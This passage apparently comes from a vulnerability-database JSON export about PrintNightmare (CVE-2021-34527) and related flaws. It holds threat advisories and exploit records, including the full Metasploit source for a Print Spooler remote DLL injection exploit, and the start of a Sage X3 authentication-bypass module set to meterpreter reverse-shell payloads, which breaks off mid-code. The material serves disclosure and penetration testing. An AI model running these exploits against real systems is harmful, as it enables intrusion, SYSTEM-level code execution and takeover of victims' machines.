"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:08", "id": "D089579B-4420-5AD5-999F-45063D972E66", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:13:50", "description": "# CVE-2021-34527\n\nCVE-2021-34527 LPE exploit using AddPrinterDri...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-05T23:48:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-08-25T17:42:32", "id": "436B5B97-EF58-5F05-B611-815DDEF67B8A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:32", "description": "# CVE-2021-34527-PrintNightmare-Workaround\n\nThis simple PowerShe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T17:50:56", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:32", "id": "BDFBDA81-0DEB-5523-B538-F23C3B524986", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:48", "description": "# Disable-Spooler-Service-PrintNightmare-CVE-2021-34527\nSimple ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-07T06:41:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T06:47:16", "id": "8542D571-7253-5609-BC52-CBCB5F40929A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the ](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>)[pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAttackers have been targeting Windows Print Spooler services for almost 2 months now. It started with the vulnerability(CVE-2021-1675) being exploited in the wild. Soon a patch was released for the same. It was after 2 days that Microsoft found out that there exist another vulnerability which gives the attacker an access to execute a code in the victim\u2019s system. This new vulnerability(CVE-2021-34527) has been named as PrintNightmare. An emergency patch has been released by Microsoft for some of the versions and a workflow as been made available for other versions.\n\n#### Vulnerability Details\n\n\n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>\n\n#### References\n\n<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>\n\n<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=notificationEmail#rapid7-analysis>\n\n<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T13:50:55", "type": "hivepro", "title": "Emergency patches have been released by Microsoft for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:50:55", "id": "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "href": "https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T21:19:09", "description": "#### THREAT LEVEL: Green.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202136.pdf>)\n\nVMware has issued patches for 19 new vulnerabilities. CVE-2021-22005 is the worst of the lot, defined as "an arbitrary file upload vulnerability in the Analytics service" of the vCenter Server. An attacker with network access to vCenter Server's port 443 might use this flaw to execute code on the server by uploading a specially crafted file. VMware also provides a temporary workaround for individuals who are unable to instantly patch their appliances.\n\n#### Vulnerability Details\n\n  \n\n#### Patch Link\n\n<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>\n\n#### References\n\n<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>\n\n<https://www.theregister.com/2021/09/22/vmware_emergency_vcenter_patch_recommendation/>", "cvss3": {}, "published": "2021-09-22T13:29:07", "type": "hivepro", "title": "Drop everything and patch VMware\u2019s vCenter Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T13:29:07", "id": "HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "href": "https://www.hivepro.com/drop-everything-and-patch-vmwares-vcenter-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:41:24", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary GUI-Vil (p0-LUCR-1), an Indonesian threat group, conducts unauthorized cryptocurrency mining using personalized infiltration tactics. They exploit AWS, leveraging compromised credentials and vulnerabilities like CVE-2021-22205. To receive real-time threat advisories, please follow HiveForce Labs on LinkedIn.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-05-25T06:36:40", "type": "hivepro", "title": "GUI-Vil Threat Group Exploits AWS for Crypto Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-05-25T06:36:40", "id": "HIVEPRO:62FBC3CC34B716CD71D68EC05F6AF2F5", "href": "https://www.hivepro.com/gui-vil-threat-group-exploits-aws-for-crypto-mining/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-22T07:28:58", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued an alert for enterprises that Russian state-sponsored cyber attackers have obtained network access by exploiting default MFA protocols and a known vulnerability. Russian state-sponsored cyber attackers got initial access to the target organization by using compromising credentials and registering a new device in the organization's Duo multi-factor authentication (MFA). The actors obtained the credentials using a brute-force password guessing attack, which provided them with access to a victim account with a basic, predictable password. The victim account had been unenrolled from Duo after a long period of inactivity, but it had not been deactivated in Active Directory. The actors were able to enroll a new device for this account, satisfy the authentication requirements, and get access to the victim network since Duo's default configuration settings allow for the re-enrollment of a new device for inactive accounts. Using the stolen account, Russian state-sponsored cyber attackers gained administrator rights by exploiting the "PrintNightmare" vulnerability (CVE-2021-34527). Furthermore, the cyber actors were able to obtain required material by moving laterally to the victim's cloud storage and email accounts. The organizations can apply the following mitigations: To prevent against "fail open" and re-enrollment scenarios, enforce MFA and examine configuration restrictions. Assure that inactive accounts are deactivated consistently across the Active Directory and MFA systems. Ensure that inactive accounts are deactivated equally across Active Directory, MFA systems, and other systems. Update software such as operating systems, apps, and hardware on a regular basis. The Mitre TTPs used in the current attack are:TA0001 - Initial AccessTA0003 - PersistenceTA0004 - Privilege EscalationTA0005 - Defense EvasionTA0006 - Credential AccessTA0007 - DiscoveryTA0008 - Lateral MovementTA0009 - CollectionT1078: Valid AccountsT1133: External Remote ServicesT1556: Modify Authentication ProcessT1068: Exploitation for Privilege EscalationT1112: Modify RegistryT1110.001: Brute Force: Password GuessingT1003.003: OS Credential Dumping: NTDST1018: Remote System DiscoveryT1560.001: Archive Collected Data: Archive via Utility Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 References https://www.cisa.gov/uscert/ncas/alerts/aa22-074a", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T13:58:03", "type": "hivepro", "title": "Russian threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T13:58:03", "id": "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "href": "https://www.hivepro.com/russian-threat-actors-leveraging-misconfigured-mfa-to-exploit-printnightmare-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-24T15:45:01", "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.\n", "cvss3": {}, "published": "2022-05-16T18:56:46", "type": "metasploit", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-24T13:16:30", "id": "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/dcerpc/cve_2021_1675_printnightmare/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\nrequire 'ruby_smb'\nrequire 'ruby_smb/error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::Retry\n include Msf::Exploit::EXE\n include Msf::Exploit::Deprecated\n\n moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'\n\n PrintSystem = RubySMB::Dcerpc::PrintSystem\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Print Spooler Remote DLL Injection',\n 'Description' => %q{\n The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.\n },\n 'Author' => [\n 'Zhiniang Peng', # vulnerability discovery / research\n 'Xuefeng Li', # vulnerability discovery / research\n 'Zhipeng Huo', # vulnerability discovery\n 'Piotr Madej', # vulnerability discovery\n 'Zhang Yunhai', # vulnerability discovery\n 'cube0x0', # PoC\n 'Spencer McIntyre', # metasploit module\n 'Christophe De La Fuente', # metasploit module co-author\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'SRVHOST' => Rex::Socket.source_address\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [\n [\n 'Windows', {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64, ARCH_X86 ]\n },\n ],\n ],\n 'DisclosureDate' => '2021-06-08',\n 'References' => [\n ['CVE', '2021-1675'],\n ['CVE', '2021-34527'],\n ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],\n ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],\n ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],\n ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']\n ],\n 'Notes' => {\n 'AKA' => [ 'PrintNightmare' ],\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK # the dll will be copied to the remote server\n ]\n }\n )\n )\n\n register_advanced_options(\n [\n OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])\n ]\n )\n deregister_options('AutoCheck')\n end\n\n def check\n begin\n connect(backend: :ruby_smb)\n rescue Rex::ConnectionError\n return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError\n return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')\n end\n\n begin\n dcerpc_bind_spoolss\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND\n print_error(\"The 'Print Spooler' service is disabled.\")\n end\n return Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\")\n end\n\n @target_arch = dcerpc_getarch\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43\n if @target_arch == ARCH_X64\n @environment = 'Windows x64'\n elsif @target_arch == ARCH_X86\n @environment = 'Windows NT x86'\n else\n return Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n print_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\")\n\n print_status('Enumerating the installed printer drivers...')\n drivers = enum_printer_drivers(@environment)\n @driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\"\n vprint_status(\"Using driver path: #{@driver_path}\")\n\n print_status('Retrieving the path of the printer driver directory...')\n @config_directory = get_printer_driver_directory(@environment)\n vprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil?\n\n container = driver_container(\n p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll',\n p_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\"\n )\n\n case add_printer_driver_ex(container)\n when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code\n return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')\n when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND\n return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_BAD_NET_NAME\n return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_ACCESS_DENIED\n return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')\n end\n\n Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n def run\n fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?\n fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?\n\n super\n end\n\n def setup\n if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0\n fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')\n end\n\n super\n end\n\n def start_service\n file_name << '.dll'\n self.file_contents = generate_payload_dll\n\n super\n end\n\n def primer\n dll_path = unc\n if dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/\n # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass\n # otherwise the operation will fail with ERROR_INVALID_PARAMETER\n dll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\"\n end\n vprint_status(\"Using DLL path: #{dll_path}\")\n\n filename = dll_path.rpartition('\\\\').last\n container = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path)\n\n 3.times do\n add_printer_driver_ex(container)\n end\n\n 1.upto(3) do |directory|\n container.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#{filename}\")\n break if add_printer_driver_ex(container).nil?\n end\n\n cleanup_service\n end\n\n def driver_container(**kwargs)\n PrintSystem::DriverContainer.new(\n level: 2,\n tag: 2,\n driver_info: PrintSystem::DriverInfo2.new(\n c_version: 3,\n p_name_ref_id: 0x00020000,\n p_environment_ref_id: 0x00020004,\n p_driver_path_ref_id: 0x00020008,\n p_data_file_ref_id: 0x0002000c,\n p_config_file_ref_id: 0x00020010,\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n p_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\",\n p_environment: @environment,\n p_driver_path: @driver_path,\n **kwargs\n )\n )\n end\n\n def dcerpc_bind_spoolss\n handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss'])\n vprint_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n vprint_status(\"Bound to #{handle} ...\")\n end\n\n def enum_printer_drivers(environment)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length\n DriverInfo2.read(response.p_drivers.map(&:chr).join)\n end\n\n def get_printer_driver_directory(environment)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length\n RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')\n end\n\n def add_printer_driver_ex(container)\n flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES\n\n begin\n response = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags)\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n message = \"Error #{nt_status.name} (#{nt_status.description})\"\n if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN\n # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected\n print_status('The named pipe connection was broken, reconnecting...')\n reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do\n dcerpc_bind_spoolss\n rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e\n false\n else\n true\n end\n\n unless reconnected\n vprint_status('Failed to reconnect to the named pipe.')\n return nil\n end\n\n print_status('Successfully reconnected to the named pipe.')\n retry\n else\n print_error(message)\n end\n\n return nt_status\n end\n\n error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first\n message = \"RpcAddPrinterDriverEx response #{response.error_status}\"\n message << \" #{error.name} (#{error.description})\" unless error.nil?\n vprint_status(message)\n error\n end\n\n def rprn_call(name, **kwargs)\n request = PrintSystem.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault => e\n fail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\")\n end\n\n PrintSystem.const_get(\"#{name}Response\").read(raw_response)\n end\n\n class DriverInfo2Header < BinData::Record\n endian :little\n\n uint32 :c_version\n uint32 :name_offset\n uint32 :environment_offset\n uint32 :driver_path_offset\n uint32 :data_file_offset\n uint32 :config_file_offset\n end\n\n # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\n DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do\n def self.read(data)\n header = DriverInfo2Header.read(data)\n new(\n header,\n RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')\n )\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-21T01:09:48", "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an available AdxAdmin service.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 Administration Service Authentication Bypass Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-SAGE-X3_ADXSRV_AUTH_BYPASS_CMD_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',\n 'Description' => %q{\n This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.\n },\n 'Author' => [\n 'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk\n 'Aaron Herndon' # @ac3lives\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2021-07-07',\n 'References' => [\n ['CVE', '2020-7387'], # Infoleak\n ['CVE', '2020-7388'], # RCE\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ],\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'CMD' => 'whoami'\n }\n }\n ],\n [\n 'Windows DLL',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Executable',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(1818)\n ]\n )\n end\n\n def vprint(msg = '')\n print(msg) if datastore['VERBOSE']\n end\n\n def check\n s = connect\n print_status('Connected')\n\n # ADXDIR command authentication header\n # allows for unauthenticated 